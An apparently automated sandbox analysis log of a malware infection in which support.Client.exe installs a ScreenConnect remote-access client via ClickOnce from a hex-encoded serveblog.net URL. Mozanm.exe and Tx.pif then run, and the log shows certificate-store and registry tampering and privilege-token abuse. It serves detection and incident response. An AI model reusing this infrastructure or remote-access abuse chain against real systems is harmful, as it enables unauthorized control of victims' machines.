68747470733a2f2f65646374686d6564752e7365727665626c6f672e6e65742f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69 = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\lock!1200000000b1570e780200000813000000000000000000006 = 30303030303237382c30316461653765316661656538303030 ScreenConnect.WindowsClient.exe Key created 
\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Assemblies ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8\implication!scre..tion_25b0fbb6ef7eb094_0017.0002_485d = 68747470733a2f2f65646374686d6564752e7365727665626c6f672e6e65742f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139 dfsvc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4F9B841DA981CA3448AB330C42ED8319\SourceList\Media msiexec.exe Key created 
\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide ScreenConnect.WindowsClient.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-F729-E0B76340D43B} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F69B68EBC5C7E714370A22D780F91E39\4F9B841DA981CA3448AB330C42ED8319 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\DigestMethod = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8\DigestValue = b023b69348bb06c4b4ad67bee0f55bb9cfb3748c dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components ScreenConnect.WindowsClient.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4F9B841DA981CA3448AB330C42ED8319\SourceList\Net msiexec.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families dfsvc.exe Key created 
\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb09 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\Files dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\lock!0e00000099af570ee4000000d810000000000000000000001 = 30303030303065342c30316461653765316633633864393839 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0002_none_4a31edb78203a9e7\lock!0400000099af570ee4000000d810000000000000000000001 = 30303030303065342c30316461653765316633633864393839 dfsvc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F69B68EBC5C7E714370A22D780F91E39 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4F9B841DA981CA3448AB330C42ED8319\SourceList msiexec.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c 
dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\DigestValue = a229e0582dc95272bc15acd59b73b5b6c8c5abcd dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\SubstructureCreated = 01 dfsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4F9B841DA981CA3448AB330C42ED8319\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c03 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\PreparedForExecution = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\implication!scre..tion_25b0fbb6ef7eb094_0017.0002_485d = 
68747470733a2f2f65646374686d6564752e7365727665626c6f672e6e65742f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b8 = 01 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_485d45469159a919 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0002_none_4a31edb78203a9e7\lock!1000000000b1570e780200000813000000000000000000006 = 
30303030303237382c30316461653765316661656538303030 ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\lock!1a00000000b1570e780200000813000000000000000000006 = 30303030303237382c30316461653765316661656538303030 ScreenConnect.WindowsClient.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (73a0227d089fe193)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_none_4a31edb78203a9e7 dfsvc.exe Set value (data) 
\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139 = 01 dfsvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\lock!010000009fae570ee4000000d810000000000000000000000 = 30303030303065342c30316461653765316633633864393839 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb09 = 30000000 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485 dfsvc.exe Set value (data) 
\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\identity = 53637265656e436f6e6e6563742e436c69656e74536572766963652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\DigestMethod = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c\DigestMethod = 01 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\VisibilityRoots ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Categories dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8\Files dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment dfsvc.exe Set value (data) 
\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb09 = 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 dfsvc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 support.Client.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 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 support.Client.exe Key deleted \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C support.Client.exe Key deleted \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 support.Client.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C support.Client.exe Set value (data) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 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 support.Client.exe -
Suspicious behavior: AddClipboardFormatListener 4 IoCs
pid Process 4952 ScreenConnect.WindowsClient.exe 2400 ScreenConnect.WindowsClient.exe 1780 ScreenConnect.WindowsClient.exe 1792 ScreenConnect.WindowsClient.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 3100 ScreenConnect.ClientService.exe 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 1756 msiexec.exe 1756 msiexec.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 2880 ScreenConnect.ClientService.exe 4168 Tx.pif 4168 Tx.pif -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 228 dfsvc.exe Token: SeDebugPrivilege 3100 ScreenConnect.ClientService.exe Token: SeDebugPrivilege 4952 ScreenConnect.WindowsClient.exe Token: SeDebugPrivilege 2296 ScreenConnect.ClientSetup.exe Token: SeShutdownPrivilege 4352 msiexec.exe Token: SeIncreaseQuotaPrivilege 4352 msiexec.exe Token: SeSecurityPrivilege 1756 msiexec.exe Token: SeCreateTokenPrivilege 4352 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4352 msiexec.exe Token: SeLockMemoryPrivilege 4352 msiexec.exe Token: SeIncreaseQuotaPrivilege 4352 msiexec.exe Token: SeMachineAccountPrivilege 4352 msiexec.exe Token: SeTcbPrivilege 4352 msiexec.exe Token: SeSecurityPrivilege 4352 msiexec.exe Token: SeTakeOwnershipPrivilege 4352 msiexec.exe Token: SeLoadDriverPrivilege 4352 msiexec.exe Token: SeSystemProfilePrivilege 4352 msiexec.exe Token: SeSystemtimePrivilege 4352 msiexec.exe Token: SeProfSingleProcessPrivilege 4352 msiexec.exe Token: SeIncBasePriorityPrivilege 4352 msiexec.exe Token: SeCreatePagefilePrivilege 4352 msiexec.exe Token: SeCreatePermanentPrivilege 4352 msiexec.exe Token: SeBackupPrivilege 4352 msiexec.exe Token: SeRestorePrivilege 4352 msiexec.exe Token: SeShutdownPrivilege 4352 msiexec.exe Token: SeDebugPrivilege 4352 msiexec.exe Token: SeAuditPrivilege 4352 msiexec.exe Token: SeSystemEnvironmentPrivilege 4352 msiexec.exe Token: SeChangeNotifyPrivilege 4352 msiexec.exe Token: SeRemoteShutdownPrivilege 4352 msiexec.exe Token: SeUndockPrivilege 4352 msiexec.exe Token: SeSyncAgentPrivilege 4352 msiexec.exe Token: SeEnableDelegationPrivilege 4352 msiexec.exe Token: SeManageVolumePrivilege 4352 msiexec.exe Token: SeImpersonatePrivilege 4352 msiexec.exe Token: SeCreateGlobalPrivilege 4352 msiexec.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: SeTakeOwnershipPrivilege 1756 msiexec.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: SeTakeOwnershipPrivilege 1756 msiexec.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: 
SeTakeOwnershipPrivilege 1756 msiexec.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: SeTakeOwnershipPrivilege 1756 msiexec.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: SeTakeOwnershipPrivilege 1756 msiexec.exe Token: SeShutdownPrivilege 3016 MsiExec.exe Token: SeDebugPrivilege 2880 ScreenConnect.ClientService.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: SeTakeOwnershipPrivilege 1756 msiexec.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: SeTakeOwnershipPrivilege 1756 msiexec.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: SeTakeOwnershipPrivilege 1756 msiexec.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: SeTakeOwnershipPrivilege 1756 msiexec.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: SeTakeOwnershipPrivilege 1756 msiexec.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: SeTakeOwnershipPrivilege 1756 msiexec.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: SeTakeOwnershipPrivilege 1756 msiexec.exe Token: SeRestorePrivilege 1756 msiexec.exe Token: SeTakeOwnershipPrivilege 1756 msiexec.exe -
Suspicious use of FindShellTrayWindow 31 IoCs
pid Process 4952 ScreenConnect.WindowsClient.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe -
Suspicious use of SendNotifyMessage 30 IoCs
pid Process 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 4168 Tx.pif 4168 Tx.pif 4168 Tx.pif 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe 400 Mozanm.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 1512 wrote to memory of 228 1512 support.Client.exe 84 PID 1512 wrote to memory of 228 1512 support.Client.exe 84 PID 228 wrote to memory of 632 228 dfsvc.exe 87 PID 228 wrote to memory of 632 228 dfsvc.exe 87 PID 228 wrote to memory of 632 228 dfsvc.exe 87 PID 632 wrote to memory of 832 632 ScreenConnect.WindowsClient.exe 88 PID 632 wrote to memory of 832 632 ScreenConnect.WindowsClient.exe 88 PID 632 wrote to memory of 832 632 ScreenConnect.WindowsClient.exe 88 PID 3100 wrote to memory of 4952 3100 ScreenConnect.ClientService.exe 90 PID 3100 wrote to memory of 4952 3100 ScreenConnect.ClientService.exe 90 PID 3100 wrote to memory of 4952 3100 ScreenConnect.ClientService.exe 90 PID 3100 wrote to memory of 2400 3100 ScreenConnect.ClientService.exe 91 PID 3100 wrote to memory of 2400 3100 ScreenConnect.ClientService.exe 91 PID 3100 wrote to memory of 2400 3100 ScreenConnect.ClientService.exe 91 PID 4952 wrote to memory of 4612 4952 ScreenConnect.WindowsClient.exe 93 PID 4952 wrote to memory of 4612 4952 ScreenConnect.WindowsClient.exe 93 PID 4952 wrote to memory of 4612 4952 ScreenConnect.WindowsClient.exe 93 PID 4612 wrote to memory of 400 4612 ScreenConnect.WindowsClient.exe 94 PID 4612 wrote to memory of 400 4612 ScreenConnect.WindowsClient.exe 94 PID 400 wrote to memory of 968 400 Mozanm.exe 95 PID 400 wrote to memory of 968 400 Mozanm.exe 95 PID 968 wrote to memory of 4168 968 cmd.exe 97 PID 968 wrote to memory of 4168 968 cmd.exe 97 PID 968 wrote to memory of 4168 968 cmd.exe 97 PID 4168 wrote to memory of 5064 4168 Tx.pif 98 PID 4168 wrote to memory of 5064 4168 Tx.pif 98 PID 4168 wrote to memory of 5064 4168 Tx.pif 98 PID 3100 wrote to memory of 2296 3100 ScreenConnect.ClientService.exe 100 PID 3100 wrote to memory of 2296 3100 ScreenConnect.ClientService.exe 100 PID 3100 wrote to memory of 2296 3100 ScreenConnect.ClientService.exe 100 PID 2296 wrote to memory of 4352 2296 ScreenConnect.ClientSetup.exe 101 PID 2296 
wrote to memory of 4352 2296 ScreenConnect.ClientSetup.exe 101 PID 2296 wrote to memory of 4352 2296 ScreenConnect.ClientSetup.exe 101 PID 1756 wrote to memory of 3016 1756 msiexec.exe 105 PID 1756 wrote to memory of 3016 1756 msiexec.exe 105 PID 1756 wrote to memory of 3016 1756 msiexec.exe 105 PID 3016 wrote to memory of 3652 3016 MsiExec.exe 106 PID 3016 wrote to memory of 3652 3016 MsiExec.exe 106 PID 3016 wrote to memory of 3652 3016 MsiExec.exe 106 PID 2880 wrote to memory of 1780 2880 ScreenConnect.ClientService.exe 108 PID 2880 wrote to memory of 1780 2880 ScreenConnect.ClientService.exe 108 PID 2880 wrote to memory of 1792 2880 ScreenConnect.ClientService.exe 109 PID 2880 wrote to memory of 1792 2880 ScreenConnect.ClientService.exe 109 PID 4168 wrote to memory of 348 4168 Tx.pif 110 PID 4168 wrote to memory of 348 4168 Tx.pif 110 PID 4168 wrote to memory of 348 4168 Tx.pif 110 PID 4168 wrote to memory of 348 4168 Tx.pif 110 PID 4168 wrote to memory of 348 4168 Tx.pif 110
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3424
-
C:\Users\Admin\AppData\Local\Temp\support.Client.exe"C:\Users\Admin\AppData\Local\Temp\support.Client.exe"2⤵
- Manipulates Digital Signatures (creates and then deletes certificate blobs under the user's HKCU TrustedPublisher store — see the Manipulates Digital Signatures IoCs; note these are per-user TrustedPublisher writes, not machine Root store changes)
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"3⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:228 -
